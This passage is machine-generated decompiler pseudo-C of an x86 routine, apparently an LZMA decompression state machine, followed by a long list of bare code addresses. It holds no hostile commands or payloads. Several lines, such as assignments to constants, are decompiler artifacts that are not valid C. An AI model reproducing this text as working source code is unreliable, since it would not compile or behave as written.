												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















              0x00407090
              0x00407090
              0x00407090
              0x00407090
              0x00407096
              0x0040709a
              0x0040709e
              0x004070a8
              0x004070b6
              0x0040738c
              0x0040738c
              0x0040738f
              0x00407396
              0x004073c3
              0x004073c3
              0x004073c7
              0x00000000
              0x00000000
              0x004073c9
              0x004073d2
              0x004073d8
              0x004073db
              0x004073de
              0x004073e1
              0x004073e4
              0x004073ea
              0x00407403
              0x00407406
              0x00407412
              0x00407413
              0x00407416
              0x004073ec
              0x004073ec
              0x004073fb
              0x004073fe
              0x004073fe
              0x00407420
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c3
              0x004073c7
              0x00000000
              0x00000000
              0x00000000
              0x00407422
              0x00407422
              0x0040739b
              0x0040739f
              0x004074d7
              0x004074d7
              0x004074e1
              0x004074e9
              0x004074f0
              0x004074f2
              0x004074f9
              0x004074fd
              0x004074fd
              0x004073a5
              0x004073ab
              0x004073b2
              0x004073ba
              0x004073ba
              0x004073bd
              0x00000000
              0x004073bd
              0x00407427
              0x00407434
              0x00407437
              0x00407343
              0x00407343
              0x00407343
              0x00406adf
              0x00406adf
              0x00406adf
              0x00406ae8
              0x00000000
              0x00000000
              0x00406aee
              0x00406aee
              0x00000000
              0x00406af5
              0x00406af9
              0x00000000
              0x00000000
              0x00406aff
              0x00406b02
              0x00406b05
              0x00406b08
              0x00406b0c
              0x00000000
              0x00000000
              0x00406b12
              0x00406b12
              0x00406b15
              0x00406b17
              0x00406b18
              0x00406b1b
              0x00406b1d
              0x00406b1e
              0x00406b20
              0x00406b23
              0x00406b28
              0x00406b2d
              0x00406b36
              0x00406b49
              0x00406b4c
              0x00406b58
              0x00406b80
              0x00406b82
              0x00406b90
              0x00406b90
              0x00406b94
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406b84
              0x00406b84
              0x00406b87
              0x00406b88
              0x00406b88
              0x00000000
              0x00406b84
              0x00406b5a
              0x00406b5e
              0x00406b63
              0x00406b63
              0x00406b6c
              0x00406b74
              0x00406b77
              0x00000000
              0x00406b7d
              0x00406b7d
              0x00000000
              0x00406b7d
              0x00000000
              0x00406b9a
              0x00406b9a
              0x00406b9e
              0x0040744a
              0x0040744a
              0x00000000
              0x0040744a
              0x00406ba4
              0x00406ba7
              0x00406bb7
              0x00406bba
              0x00406bbd
              0x00406bbd
              0x00406bbd
              0x00406bc0
              0x00406bc4
              0x00000000
              0x00000000
              0x00406bc6
              0x00406bc6
              0x00406bcc
              0x00406bf6
              0x00406bfc
              0x00406c03
              0x00000000
              0x00406c03
              0x00406bce
              0x00406bd2
              0x00406bd5
              0x00406bda
              0x00406bda
              0x00406be5
              0x00406bed
              0x00406bf0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406c35
              0x00406c3b
              0x00406c3e
              0x00406c4b
              0x00406c53
              0x00000000
              0x00000000
              0x00406c0a
              0x00406c0a
              0x00406c0e
              0x00407459
              0x00407459
              0x00000000
              0x00407459
              0x00406c14
              0x00406c1a
              0x00406c25
              0x00406c25
              0x00406c25
              0x00406c28
              0x00406c2b
              0x00406c2e
              0x00406c33
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004072ca
              0x004072ca
              0x004072d0
              0x004072d6
              0x004072dc
              0x004072f6
              0x004072f9
              0x004072ff
              0x0040730a
              0x0040730a
              0x0040730c
              0x004072de
              0x004072de
              0x004072ed
              0x004072f1
              0x004072f1
              0x00407316
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00407318
              0x0040731c
              0x004074cb
              0x004074cb
              0x00000000
              0x004074cb
              0x00407322
              0x00407328
              0x0040732f
              0x00407337
              0x0040733a
              0x0040733d
              0x0040733d
              0x00407343
              0x00407343
              0x00000000
              0x00000000
              0x00406c5b
              0x00406c5b
              0x00406c5d
              0x00406c60
              0x00406cd1
              0x00406cd1
              0x00406cd4
              0x00406cd7
              0x00406cde
              0x00406ce8
              0x00000000
              0x00406ce8
              0x00406c62
              0x00406c62
              0x00406c66
              0x00406c69
              0x00406c6b
              0x00406c6e
              0x00406c71
              0x00406c73
              0x00406c76
              0x00406c78
              0x00406c7d
              0x00406c80
              0x00406c83
              0x00406c87
              0x00406c8e
              0x00406c91
              0x00406c98
              0x00406c9c
              0x00406ca4
              0x00406ca4
              0x00406ca4
              0x00406c9e
              0x00406c9e
              0x00406c9e
              0x00406c93
              0x00406c93
              0x00406c93
              0x00406ca8
              0x00406cab
              0x00406cc9
              0x00406cc9
              0x00406ccb
              0x00000000
              0x00406cad
              0x00406cad
              0x00406cad
              0x00406cb0
              0x00406cb3
              0x00406cb6
              0x00406cb8
              0x00406cb8
              0x00406cb8
              0x00406cbb
              0x00406cbe
              0x00406cc0
              0x00406cc1
              0x00406cc4
              0x00000000
              0x00406cc4
              0x00000000
              0x00406efa
              0x00406efa
              0x00406efe
              0x00406f1c
              0x00406f1c
              0x00406f1f
              0x00406f26
              0x00406f29
              0x00406f2c
              0x00406f2f
              0x00406f32
              0x00406f35
              0x00406f37
              0x00406f3e
              0x00406f3f
              0x00406f41
              0x00406f44
              0x00406f47
              0x00406f4a
              0x00406f4a
              0x00406f4f
              0x00000000
              0x00406f4f
              0x00406f00
              0x00406f00
              0x00406f03
              0x00406f06
              0x00406f10
              0x00000000
              0x00000000
              0x00406f64
              0x00406f64
              0x00406f68
              0x00406f8b
              0x00406f8e
              0x00406f91
              0x00406f9b
              0x00406f6a
              0x00406f6a
              0x00406f6d
              0x00406f70
              0x00406f73
              0x00406f80
              0x00406f83
              0x00406f83
              0x00000000
              0x00000000
              0x00406fa7
              0x00406fa7
              0x00406fab
              0x00000000
              0x00000000
              0x00406fb1
              0x00406fb1
              0x00406fb5
              0x00000000
              0x00000000
              0x00406fbb
              0x00406fbb
              0x00406fbd
              0x00406fc1
              0x00406fc1
              0x00406fc4
              0x00406fc8
              0x00000000
              0x00000000
              0x00407018
              0x00407018
              0x0040701c
              0x00407023
              0x00407023
              0x00407026
              0x00407029
              0x00407033
              0x00000000
              0x00407033
              0x0040701e
              0x0040701e
              0x00000000
              0x00000000
              0x0040703f
              0x0040703f
              0x00407043
              0x0040704a
              0x0040704d
              0x00407050
              0x00407045
              0x00407045
              0x00407045
              0x00407053
              0x00407056
              0x00407059
              0x00407059
              0x0040705c
              0x0040705f
              0x00407062
              0x00407062
              0x00407065
              0x0040706c
              0x00407071
              0x00000000
              0x00000000
              0x004070ff
              0x004070ff
              0x00407103
              0x004074a1
              0x004074a1
              0x00000000
              0x004074a1
              0x00407109
              0x00407109
              0x0040710c
              0x0040710f
              0x00407113
              0x00407116
              0x0040711c
              0x0040711e
              0x0040711e
              0x0040711e
              0x00407121
              0x00407124
              0x00000000
              0x00000000
              0x00406cf4
              0x00406cf4
              0x00406cf8
              0x00407465
              0x00407465
              0x00000000
              0x00407465
              0x00406cfe
              0x00406cfe
              0x00406d01
              0x00406d04
              0x00406d08
              0x00406d0b
              0x00406d11
              0x00406d13
              0x00406d13
              0x00406d13
              0x00406d16
              0x00406d19
              0x00406d19
              0x00406d1c
              0x00406d1f
              0x00000000
              0x00000000
              0x00406d25
              0x00406d25
              0x00406d2b
              0x00000000
              0x00000000
              0x00406d31
              0x00406d31
              0x00406d35
              0x00406d38
              0x00406d3b
              0x00406d3e
              0x00406d41
              0x00406d42
              0x00406d45
              0x00406d47
              0x00406d4d
              0x00406d50
              0x00406d53
              0x00406d56
              0x00406d59
              0x00406d5c
              0x00406d5f
              0x00406d7b
              0x00406d7e
              0x00406d81
              0x00406d84
              0x00406d8b
              0x00406d8f
              0x00406d91
              0x00406d95
              0x00406d61
              0x00406d61
              0x00406d65
              0x00406d6d
              0x00406d72
              0x00406d74
              0x00406d76
              0x00406d76
              0x00406d98
              0x00406d9f
              0x00406da2
              0x00000000
              0x00406da8
              0x00406da8
              0x00000000
              0x00406da8
              0x00000000
              0x00406dad
              0x00406dad
              0x00406db1
              0x00407471
              0x00407471
              0x00000000
              0x00407471
              0x00406db7
              0x00406db7
              0x00406dba
              0x00406dbd
              0x00406dc1
              0x00406dc4
              0x00406dca
              0x00406dcc
              0x00406dcc
              0x00406dcc
              0x00406dcf
              0x00406dd2
              0x00406dd2
              0x00406dd2
              0x00406dd8
              0x00000000
              0x00000000
              0x00406dda
              0x00406dda
              0x00406ddd
              0x00406de0
              0x00406de3
              0x00406de6
              0x00406de9
              0x00406dec
              0x00406def
              0x00406df2
              0x00406df5
              0x00406df8
              0x00406e10
              0x00406e13
              0x00406e16
              0x00406e19
              0x00406e19
              0x00406e1c
              0x00406e20
              0x00406e22
              0x00406dfa
              0x00406dfa
              0x00406e02
              0x00406e07
              0x00406e09
              0x00406e0b
              0x00406e0b
              0x00406e25
              0x00406e2c
              0x00406e2f
              0x00000000
              0x00406e31
              0x00406e31
              0x00000000
              0x00406e31
              0x00406e2f
              0x00406e36
              0x00406e36
              0x00406e36
              0x00406e36
              0x00000000
              0x00000000
              0x00406e71
              0x00406e71
              0x00406e75
              0x0040747d
              0x0040747d
              0x00000000
              0x0040747d
              0x00406e7b
              0x00406e7b
              0x00406e7e
              0x00406e81
              0x00406e85
              0x00406e88
              0x00406e8e
              0x00406e90
              0x00406e90
              0x00406e90
              0x00406e93
              0x00406e96
              0x00406e96
              0x00406e9c
              0x00406e3a
              0x00406e3a
